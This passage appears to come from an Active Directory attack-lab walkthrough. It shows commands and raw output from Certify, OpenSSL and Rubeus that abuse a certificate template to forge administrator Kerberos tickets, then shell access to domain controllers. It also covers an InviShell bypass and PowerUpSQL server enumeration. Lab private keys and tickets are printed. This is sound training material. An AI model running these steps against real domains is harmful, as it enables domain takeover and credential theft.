MFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9bW9uZXlj
b3JwLERDPWxvY2FsP2NBQ2VydGlmaWNhdGU/YmFzZT9vYmplY3RDbGFzcz1jZXJ0
aWZpY2F0aW9uQXV0aG9yaXR5MA0GCSqGSIb3DQEBCwUAA4IBAQBlLBOamsvCm4i/
Fe4CF8+a9VaQQkSQdIorNbtgwJiyywmORkNN+Aes6Gh5trj48MWzF0l9OuKtnmN8
1+kceNUP9nd8owET2WrdqSTZFnHkGn7EI1zeA6lusEtGYYh+ZSOJ0VHrQkj7ag80
HPTrfKFQ3IwVElhI5joza4A46hvyurAgGD9TPJLXp3XfW8GPoHZbYZBhx0Z+MdBS
+6VSo+X+CekEn6R46xwm7PR83PUlkLlQ0gWv5Wp1GGpk3ZoGoWkQcKhMzo8w5l+R
fzWXRV1aOklUyLGxttTmQVyQC0WFYT/XJ62z7+RuNMrMhW5YTWqGsX+b8h+eDRMD
czCMLOgC
-----END CERTIFICATE-----

[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic
Provider v1.0" -export -out cert.pfx

Certify completed in 00:00:15.6708451

Now we copy the certificate to a notepad file and save it as cert.pem. With OpenSSL we can convert the
pem file to pfx file.
C:\Windows\system32>C:\AD\Tools\openssl\openssl.exe pkcs12 -in
"C:\Users\student163\Desktop\cert.pem" -keyex -CSP "Microsoft Enhanced Cryptographic Provider
v1.0" -export -out C:\Users\student163\Desktop\certificate.pfx
WARNING: can't open config file: /usr/local/ssl/openssl.cnf
Enter Export Password:
Verifying - Enter Export Password:

Request a TGT
With Rubeus and the certificate file we can request for a TGT.
C:\Windows\system32>C:\Ad\Tools\Rubeus.exe asktgt /user:administrator
/certificate:"C:\Users\student163\Desktop\certificate.pfx" /password:P@ssw0rd /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
 |_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=student163, CN=Users, DC=dollarcorp,
DC=moneycorp, DC=local
[*] Building AS-REQ (w/ PKINIT preauth) for: 'dollarcorp.moneycorp.local\administrator'
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

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
ZG9sbGFyY29ycC5tb25leWNvcnAubG9jYWw=
[+] Ticket successfully imported!

ServiceName : krbtgt/dollarcorp.moneycorp.local
ServiceRealm : DOLLARCORP.MONEYCORP.LOCAL
UserName : administrator
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 7/5/2024 2:45:06 AM
EndTime : 7/5/2024 12:45:06 PM
RenewTill : 7/12/2024 2:45:06 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : JPScBaNzUmr9vmPaiaowNA==
ASREP (key) : 425691A06BD22882B41A611B57E67948

C:\Windows\system32>klist
Current LogonId is 0:0x16159e5

Cached Tickets: (1)

#0> Client: administrator @ DOLLARCORP.MONEYCORP.LOCAL

Server: krbtgt/dollarcorp.moneycorp.local @ DOLLARCORP.MONEYCORP.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
Start Time: 7/5/2024 2:45:06 (local)
End Time: 7/5/2024 12:45:06 (local)
Renew Time: 7/12/2024 2:45:06 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0x1 -> PRIMARY
Kdc Called:

C:\Windows\system32>winrs -r:dcorp-dc.dollarcorp.moneycorp.local cmd.exe

Microsoft Windows [Version 10.0.20348.2227]
(c) Microsoft Corporation. All rights reserved.

C:\Users\Administrator>set username
set username
USERNAME=Administrator

C:\Users\Administrator>set computername
set computername
COMPUTERNAME=DCORP-DC

Escalation to Enterprise Administrator

We could use the same method to escalate our privileges to enterprise administrators.

Request a certificate
C:\Windows\system32>C:\AD\Tools\certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-
DC-CA /template:HTTPSCertificates /altname:moneycorp.local\administrator

_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.0.0

[*] Action: Request a Certificates

[*] Current user context : dcorp\student163

[*] No subject name specified, using current context as subject.

[*] Template : HTTPSCertificates

[*] Subject : CN=student163, CN=Users, DC=dollarcorp, DC=moneycorp, DC=local
[*] AltName : moneycorp.local\administrator

[*] Certificate Authority : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA

[*] CA Response : The certificate had been issued.
[*] Request ID : 33

[*] cert.pem :

-----BEGIN RSA PRIVATE KEY-----

MIIEogIBAAKCAQEAw2a6FX+6h+J+g3jhL4jYL/9ANgXvfyvJ1zcLIsXxKUAuqXV1
zKD6+VFsUNVnEbhWTCQvtGq6H61p5lytIXavdFyFdp3/abZfwFG2sRCGXvixAlG5
+kfbbpHNNUCDFmMGtwz0lsfWL8CMcKQXBk0lBXFyWRF7/Cc6ujLDWvO82O0pVosq
h9aK3ilyzkhwavuZoHfJTa+MyhuCpzvS263hRbul7pqguTYSMQZ1dS0NvXeUzz+U
hZ+MQj8vIa5ivRpItNDpje68JSl4sKbvLz3kRQr8GsvEacTzQPOLC9Svuh3PFnqh
W1ei1BDwRYFtZWLdmwsxux8lKo7dcVSJimO/RQIDAQABAoIBACjxSWRf0xHN33xk
w6pWHhZQgX/QVpJq9mvl2Kt8lj9yd1SCjCBISs4axXtae7I20b46htRi2ITyrRHb
sVslpzXWfRCRoobf88g0Vvda4wzbRxuZTEKo882DN2BFGDKEpU+No2JElRiEW+ju
OPTVDUDKuI75HuWCwsdpA433LEa3bOvK1LPHLxaSrJZP5BkYeKcUwz13b+rar0eN
PbQZKdJVx8sWFzoobAHZzgonZ9KfLomKwupFza9kAJTNil5SuDNsxsHwOXLA1+hc
3d21IN/4EG61IpB7fKG63ONLcKrb3WBSy0smPyk9gdXwaVDiY+EIh+H5TFpBHfkq
OsfpaTECgYEA1Gp1KMHHX2wvmrrB6hsmFUz6Tc9dMuWexkYVZ4XhrtNpKK+kq2Li
A4Sq450FO4hZ5U3R71aI1//se6hzw6bd6/JNgAY/XQ0cmQMB2WfRMcZTEHsCiS+j
fnQvyLa14u85P7knKhzuL64U2bbOXsDWsNJdTytk6EdWCzW4NQqCKCcCgYEA636L
986jEFfrBSxGICHQQ66Wt+2uC/+VFKEMEpJLmhvT+m7y7rIhiGd+1/D15Y7Xt4ux
3lwwut+ikQHNZC3HnNmvvatZQQ+n2xtl4eeVSjmmFzI2hxwKZKuEBvi4tsBeVDoN
FBqDzfwQUFwZTpmXWKRbGEerpzu1pdIqFt1QdLMCgYAPg/Mo1fatJqbXg3q0keUX
OzcxRctF83XEf8wCcsoIThLpUOMTTba6kQ82bvq53XzLfgKum8CFHoF0itph2Sdu
m5VDm7E3J8UF/C0/ZxDltNnOY13NDXjAvNXcsFPazqR83hZZQiG3w9xsBqlOTIGi
CsucA8xsFwHW8caRwUG+kwKBgETcsFk6V3yD+Pl+RNNIj/n6p6AJJIflqNZrcXhM
x0a9NHNa1jbuZ9fXS8QhdgY2iuXlN5HqK2W513PHryPIL0KydS1lWagox9DOZjB0
47bcvLCzwjYoAPIHJYhUWs812V+PyhtC1Z/6QVr+U3gkeZk2Fl03N/6i+y8OEbi1
5rz5AoGAIL20mvfPJ0kokzMLgXA9bzbBpz9d5eH6JQY+/wG541mc7uzbtjQol79X
cz4GGFoAgCKEpq4KqbwDjuYlCQy6lokx9uF0egGP4fXdmjJ7cV4ZoaIpE37sLxEY
RUljQEuKh0RA3lDLA6aQb4ffAMPp8XsV6a5cU1D18BGxUUw9/AM=
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIGcjCCBVqgAwIBAgITFQAAACEfCN6T+0sPuAAAAAAAITANBgkqhkiG9w0BAQsF
ADBSMRUwEwYKCZImiZPyLGQBGRYFbG9jYWwxGTAXBgoJkiaJk/IsZAEZFgltb25l
eWNvcnAxHjAcBgNVBAMTFW1vbmV5Y29ycC1NQ09SUC1EQy1DQTAeFw0yNDA3MDUw
OTQ1MzlaFw0yNjA3MDUwOTU1MzlaMHMxFTATBgoJkiaJk/IsZAEZFgVsb2NhbDEZ
MBcGCgmSJomT8ixkARkWCW1vbmV5Y29ycDEaMBgGCgmSJomT8ixkARkWCmRvbGxh
cmNvcnAxDjAMBgNVBAMTBVVzZXJzMRMwEQYDVQQDEwpzdHVkZW50MTYzMIIBIjAN
BgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw2a6FX+6h+J+g3jhL4jYL/9ANgXv
fyvJ1zcLIsXxKUAuqXV1zKD6+VFsUNVnEbhWTCQvtGq6H61p5lytIXavdFyFdp3/
abZfwFG2sRCGXvixAlG5+kfbbpHNNUCDFmMGtwz0lsfWL8CMcKQXBk0lBXFyWRF7
/Cc6ujLDWvO82O0pVosqh9aK3ilyzkhwavuZoHfJTa+MyhuCpzvS263hRbul7pqg
uTYSMQZ1dS0NvXeUzz+UhZ+MQj8vIa5ivRpItNDpje68JSl4sKbvLz3kRQr8GsvE
acTzQPOLC9Svuh3PFnqhW1ei1BDwRYFtZWLdmwsxux8lKo7dcVSJimO/RQIDAQAB
o4IDHjCCAxowPQYJKwYBBAGCNxUHBDAwLgYmKwYBBAGCNxUIheGocofMn2jhhyaC
n65RgvL2fYE/hpePdoe0hBICAWQCAQYwKQYDVR0lBCIwIAYIKwYBBQUHAwIGCCsG
AQUFBwMEBgorBgEEAYI3CgMEMA4GA1UdDwEB/wQEAwIFoDA1BgkrBgEEAYI3FQoE
KDAmMAoGCCsGAQUFBwMCMAoGCCsGAQUFBwMEMAwGCisGAQQBgjcKAwQwRAYJKoZI
hvcNAQkPBDcwNTAOBggqhkiG9w0DAgICAIAwDgYIKoZIhvcNAwQCAgCAMAcGBSsO
AwIHMAoGCCqGSIb3DQMHMB0GA1UdDgQWBBSlFDDFsi1QEIk7lKzL9iXAv+1jYjA4
BgNVHREEMTAvoC0GCisGAQQBgjcUAgOgHwwdbW9uZXljb3JwLmxvY2FsXGFkbWlu
aXN0cmF0b3IwHwYDVR0jBBgwFoAU0f6NCqf6tDKfNvwguPfLnmjFRe0wgdgGA1Ud
HwSB0DCBzTCByqCBx6CBxIaBwWxkYXA6Ly8vQ049bW9uZXljb3JwLU1DT1JQLURD
LUNBLENOPW1jb3JwLWRjLENOPUNEUCxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNl
cyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPW1vbmV5Y29ycCxEQz1s
b2NhbD9jZXJ0aWZpY2F0ZVJldm9jYXRpb25MaXN0P2Jhc2U/b2JqZWN0Q2xhc3M9
Y1JMRGlzdHJpYnV0aW9uUG9pbnQwgcsGCCsGAQUFBwEBBIG+MIG7MIG4BggrBgEF
BQcwAoaBq2xkYXA6Ly8vQ049bW9uZXljb3JwLU1DT1JQLURDLUNBLENOPUFJQSxD
Tj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1
cmF0aW9uLERDPW1vbmV5Y29ycCxEQz1sb2NhbD9jQUNlcnRpZmljYXRlP2Jhc2U/
b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTANBgkqhkiG9w0BAQsF
AAOCAQEALp4KKa+fKemmu7OQ+NsPLWIY0FSjvqdAvWPiARMfJG9/Pu8kZJ1evEFO
YpsSRUwZPcRNHyeGe1i3IsP1AnrVqu0dsLePgW5kdC27FcY6F1jBrfwElqfuiGE4
Zy0oIoM/3ck/sS2ZEQRwLsYyqPULiIRWwNrsAwT6sbcPARvHpmzvBvcvEaPY9wNW
Ph2gICdyuKdPzHoXghA7Dw4sL4cw2CimlA70q9/RFtNBFCAzrjUiYy6LN07yrmgV
8EmhW7F9iC47xkO7zBgclsWTx+vzaWbE/4SyygpBr+17WEBSB4OcbWHj7ilgBHkO
/gQlhikD6c2+KV+HT6pUNunhT+q7ZQ==
-----END CERTIFICATE-----

[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic
Provider v1.0" -export -out cert.pfx

Certify completed in 00:00:15.1168120

Now we copy the certificate to a notepad file and save it as cert.pem. With OpenSSL we can convert the
pem file to pfx file.
C:\Windows\system32>C:\AD\Tools\openssl\openssl.exe pkcs12 -in "C:\Users\student163\Desktop\cert-
EA.pem" -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out
C:\Users\student163\Desktop\certificate-EA.pfx
WARNING: can't open config file: /usr/local/ssl/openssl.cnf
Enter Export Password:
Verifying - Enter Export Password:

Request a TGT
C:\Windows\system32>C:\Ad\Tools\Rubeus.exe asktgt /user:moneycorp.local\administrator /dc:mcorp-
dc.moneycorp.local /certificate:"C:\Users\student163\Desktop\certificate-EA.pfx"
/password:P@ssw0rd /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=student163, CN=Users, DC=dollarcorp,
DC=moneycorp, DC=local
[*] Building AS-REQ (w/ PKINIT preauth) for: 'moneycorp.local\administrator'
[*] Using domain controller: 172.16.1.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

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
[+] Ticket successfully imported!

ServiceName : krbtgt/moneycorp.local
ServiceRealm : MONEYCORP.LOCAL
UserName : administrator
UserRealm : MONEYCORP.LOCAL
StartTime : 7/5/2024 3:02:08 AM
EndTime : 7/5/2024 1:02:08 PM
RenewTill : 7/12/2024 3:02:08 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : 4Fns376qaf0T/hl1/9Nb4g==
ASREP (key) : BCA608E43E28AC4DDD0839391B6CC66E

C:\Windows\system32>klist

Current LogonId is 0:0x1e09b03

Cached Tickets: (1)

#0> Client: administrator @ MONEYCORP.LOCAL

Server: krbtgt/moneycorp.local @ MONEYCORP.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
Start Time: 7/5/2024 3:02:08 (local)
End Time: 7/5/2024 13:02:08 (local)
Renew Time: 7/12/2024 3:02:08 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0x1 -> PRIMARY
Kdc Called:

C:\Windows\system32>winrs -r:mcorp-dc.moneycorp.local cmd.exe

Microsoft Windows [Version 10.0.20348.2227]
(c) Microsoft Corporation. All rights reserved.
C:\Users\Administrator>set username
set username
USERNAME=Administrator

C:\Users\Administrator>set computername
set computername
COMPUTERNAME=MCORP-DC
MS SQL Servers abuse
Enumeration
We use PowerUpSQL to enumerate the MSSQL servers in the domain.

Listing SQL Servers

Get-SQLInstanceDomain -Verbose - SPN Scanning. It looks for service principal names that begins with
MSSQL.
C:\Windows\system32>C:\Ad\Tools\InviShell\RunWithPathAsAdmin.bat

C:\Windows\system32>set COR_ENABLE_PROFILING=1

C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>set COR_PROFILER_PATH=C:\AD\Tools\InviShell\InShellProf.dll

C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> Import-Module C:\Ad\Tools\PowerUpSQL-master\PowerUpSQL.psd1

WARNING: The names of some imported commands from the module 'PowerUpSQL' include unapproved
verbs that might make them
less discoverable. To find the commands with unapproved verbs, run the Import-Module command
again with the Verbose
parameter. For a list of approved verbs, type Get-Verb.
PS C:\Windows\system32> Get-SQLInstanceDomain -Verbose
VERBOSE: Grabbing SPNs from the domain for SQL Servers (MSSQL*)...
VERBOSE: Parsing SQL Server instances from SPNs...
VERBOSE: 6 instances were found.

ComputerName : dcorp-mgmt.dollarcorp.moneycorp.local
Instance : dcorp-mgmt.dollarcorp.moneycorp.local,1433
DomainAccountSid : 15000005210001391322314218022427222724713123394400
DomainAccount : svcadmin
DomainAccountCn : svc admin
Service : MSSQLSvc
Spn : MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433
LastLogon : 7/5/2024 12:41 AM
Description : Account to be used for services which need high privileges.

ComputerName : dcorp-mgmt.dollarcorp.moneycorp.local
Instance : dcorp-mgmt.dollarcorp.moneycorp.local
DomainAccountSid : 15000005210001391322314218022427222724713123394400
DomainAccount : svcadmin
DomainAccountCn : svc admin
Service : MSSQLSvc
Spn : MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local
LastLogon : 7/5/2024 12:41 AM
Description : Account to be used for services which need high privileges.
ComputerName : dcorp-mssql.dollarcorp.moneycorp.local
Instance : dcorp-mssql.dollarcorp.moneycorp.local,1433
DomainAccountSid : 15000005210001391322314218022427222724713123385400
DomainAccount : DCORP-MSSQL$
DomainAccountCn : DCORP-MSSQL
Service : MSSQLSvc
Spn : MSSQLSvc/dcorp-mssql.dollarcorp.moneycorp.local:1433
LastLogon : 7/5/2024 3:06 AM
Description :

ComputerName : dcorp-mssql.dollarcorp.moneycorp.local
Instance : dcorp-mssql.dollarcorp.moneycorp.local
DomainAccountSid : 15000005210001391322314218022427222724713123385400
DomainAccount : DCORP-MSSQL$
DomainAccountCn : DCORP-MSSQL
Service : MSSQLSvc
Spn : MSSQLSvc/dcorp-mssql.dollarcorp.moneycorp.local
LastLogon : 7/5/2024 3:06 AM
Description :

ComputerName : dcorp-sql1.dollarcorp.moneycorp.local
Instance : dcorp-sql1.dollarcorp.moneycorp.local,1433
DomainAccountSid : 15000005210001391322314218022427222724713123386400
DomainAccount : DCORP-SQL1$
DomainAccountCn : DCORP-SQL1
Service : MSSQLSvc
Spn : MSSQLSvc/dcorp-sql1.dollarcorp.moneycorp.local:1433
LastLogon : 7/5/2024 3:06 AM
Description :

ComputerName : dcorp-sql1.dollarcorp.moneycorp.local
Instance : dcorp-sql1.dollarcorp.moneycorp.local
DomainAccountSid : 15000005210001391322314218022427222724713123386400
DomainAccount : DCORP-SQL1$
DomainAccountCn : DCORP-SQL1
Service : MSSQLSvc
Spn : MSSQLSvc/dcorp-sql1.dollarcorp.moneycorp.local
LastLogon : 7/5/2024 3:06 AM
Description :

From the output, it can be confirmed that there are 3 SQL servers in the domain.

• dcorp-mgmt.dollarcorp.moneycorp.local

• dcorp-mssql.dollarcorp.moneycorp.local

• dcorp-sql1.dollarcorp.moneycorp.local

Test Connectivity
PS C:\Windows\system32> Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose
VERBOSE: Creating runspace pool and session states
VERBOSE: dcorp-mgmt.dollarcorp.moneycorp.local : Connection Failed.
VERBOSE: dcorp-mgmt.dollarcorp.moneycorp.local,1433 : Connection Failed.
VERBOSE: dcorp-mssql.dollarcorp.moneycorp.local,1433 : Connection Success.
VERBOSE: dcorp-mssql.dollarcorp.moneycorp.local : Connection Success.
VERBOSE: dcorp-sql1.dollarcorp.moneycorp.local,1433 : Connection Failed.
VERBOSE: dcorp-sql1.dollarcorp.moneycorp.local : Connection Failed.
VERBOSE: DCORP-STD163 : Connection Failed.
VERBOSE: Closing the runspace pool

ComputerName Instance Status

------------ -------- ------
dcorp-mgmt.dollarcorp.moneycorp.local dcorp-mgmt.dollarcorp.moneycorp.local Not Accessible
dcorp-mgmt.dollarcorp.moneycorp.local dcorp-mgmt.dollarcorp.moneycorp.local,1433 Not Accessible
dcorp-mssql.dollarcorp.moneycorp.local dcorp-mssql.dollarcorp.moneycorp.local,1433 Accessible
dcorp-mssql.dollarcorp.moneycorp.local dcorp-mssql.dollarcorp.moneycorp.local Accessible
dcorp-sql1.dollarcorp.moneycorp.local dcorp-sql1.dollarcorp.moneycorp.local,1433 Not Accessible
dcorp-sql1.dollarcorp.moneycorp.local dcorp-sql1.dollarcorp.moneycorp.local Not Accessible
DCORP-STD163 DCORP-STD163 Not Accessible

Extracting information
PS C:\Windows\system32> Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
VERBOSE: dcorp-mgmt.dollarcorp.moneycorp.local,1433 : Connection Failed.
VERBOSE: dcorp-mgmt.dollarcorp.moneycorp.local : Connection Failed.
VERBOSE: dcorp-mssql.dollarcorp.moneycorp.local,1433 : Connection Success.
VERBOSE: dcorp-mssql.dollarcorp.moneycorp.local : Connection Success.
